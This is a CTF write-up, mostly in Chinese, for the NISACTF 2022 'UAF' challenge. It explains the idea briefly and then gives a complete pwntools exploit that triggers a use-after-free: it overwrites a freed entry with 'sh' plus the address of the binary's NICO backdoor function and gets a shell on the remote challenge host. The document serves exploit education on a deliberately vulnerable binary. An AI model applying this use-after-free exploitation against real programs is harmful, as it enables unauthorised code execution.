Problem: [NISACTF 2022]UAF
思路
在 payload 开头用 sh\x00\x00 占满 4 字节做对齐，其后紧跟 NICO 的地址；NICO 是程序中的后门函数。
EXP
from pwn import *
# Verbose pwntools logging: traffic on the tube is printed as it is sent
# and received.
context.log_level = "debug"

# Connect to the remote challenge instance. The commented-out line below
# starts the local ./pwn binary instead.
io = remote(host="node4.anna.nssctf.cn", port=28208)
#io = process("./pwn")

# Parse the challenge binary so that symbol addresses can be looked up by name.
e = ELF("./pwn")

# libc 2.31 image taken from a local glibc-all-in-one checkout.
# NOTE(review): nothing in the visible script reads `libc`, and the absolute
# path is specific to the author's machine.
libc = ELF("/home/rick/glibc-all-in-one/libs/2.31-0ubuntu9.17_amd64/libc-2.31.so")
# Short aliases around the module-level pwntools tube `io`. Each helper looks
# `io` up when it is called, so `io` must be bound before first use.


def s(data):
    """Send ``data`` on the tube as-is (no newline appended)."""
    return io.send(data)


def sa(delim, data):
    """Wait until ``delim`` has been received, then send ``data``."""
    return io.sendafter(delim, data)


def sl(data):
    """Send ``data`` followed by a newline."""
    return io.sendline(data)


def sla(delim, data):
    """Wait until ``delim`` has been received, then send ``data`` plus a newline."""
    return io.sendlineafter(delim, data)


def r(num):
    """Receive up to ``num`` bytes from the tube."""
    return io.recv(num)


def ru(delims, drop=True):
    """Receive until ``delims`` is seen; ``drop`` is passed through to recvuntil."""
    return io.recvuntil(delims, drop)


def itr():
    """Hand the tube over to the terminal for interactive use."""
    return io.interactive()


def uu32(data):
    """Right-pad ``data`` with NUL bytes to 4 bytes and unpack it with ``u32``."""
    padded = data.ljust(4, b'\x00')
    return u32(padded)


def uu64(data):
    """Right-pad ``data`` with NUL bytes to 8 bytes and unpack it with ``u64``."""
    padded = data.ljust(8, b'\x00')
    return u64(padded)


def ls(data):
    """Log ``data`` through pwntools' ``log.success``."""
    return log.success(data)
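def new():
    """Choose menu option 1 (presumably "create an entry", going by the name).

    Waits for the ``:`` prompt and sends the choice as bytes. The earlier
    version passed a ``str``, which pwntools on Python 3 only accepts by
    implicitly encoding it and emitting a BytesWarning.
    """
    sla(b":", b"1")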
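def edit(idx, content):
    """Choose menu option 2 and submit ``content`` for entry ``idx``.

    All values are sent as bytes; the earlier version passed ``str`` for the
    menu choice and the index, which pwntools on Python 3 only accepts by
    implicitly encoding it and emitting a BytesWarning.

    Args:
        idx: Entry index; converted with ``str()`` and sent as ASCII bytes.
        content: Bytes sent after the ``Input your strings`` prompt.
    """
    sla(b":", b"2")
    # The index is sent immediately, without waiting for a prompt.
    sl(str(idx).encode())
    sla(b"Input your strings", content)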
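def show(idx):
    """Choose menu option 4 for entry ``idx``.

    The menu choice and the index are sent as bytes; the earlier version
    passed ``str``, which pwntools on Python 3 only accepts by implicitly
    encoding it and emitting a BytesWarning.

    Args:
        idx: Entry index; converted with ``str()`` and sent as ASCII bytes.
    """
    sla(b":", b"4")
    # The index is sent immediately, without waiting for a prompt.
    sl(str(idx).encode())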
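def free(idx):
    """Choose menu option 3 for entry ``idx`` (presumably "release", going by the name).

    The menu choice and the index are sent as bytes; the earlier version
    passed ``str``, which pwntools on Python 3 only accepts by implicitly
    encoding it and emitting a BytesWarning.

    Args:
        idx: Entry index; converted with ``str()`` and sent as ASCII bytes.
    """
    sla(b":", b"3")
    # The index is sent immediately, without waiting for a prompt.
    sl(str(idx).encode())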
# Menu operations in order: create an entry, release index 0, create again.
new()
free(0)
new()

# 8-byte payload: the 4 bytes b'sh\x00\x00' followed by the 32-bit packed
# address of the NICO symbol (described in the write-up as the binary's
# backdoor function).
payload = b'sh\x00\x00' + p32(e.sym["NICO"])
edit(1, payload)

# "show" is requested for index 0, which was released above: this is the
# use-after-free named in the challenge title.
# NOTE(review): assumes the program keeps the stale entry usable after
# release; on the program side the fix is to clear the entry when it is
# released and to reject released indexes.
show(0)
#attach(io)
io.interactive()
总结
- 对该题的考点总结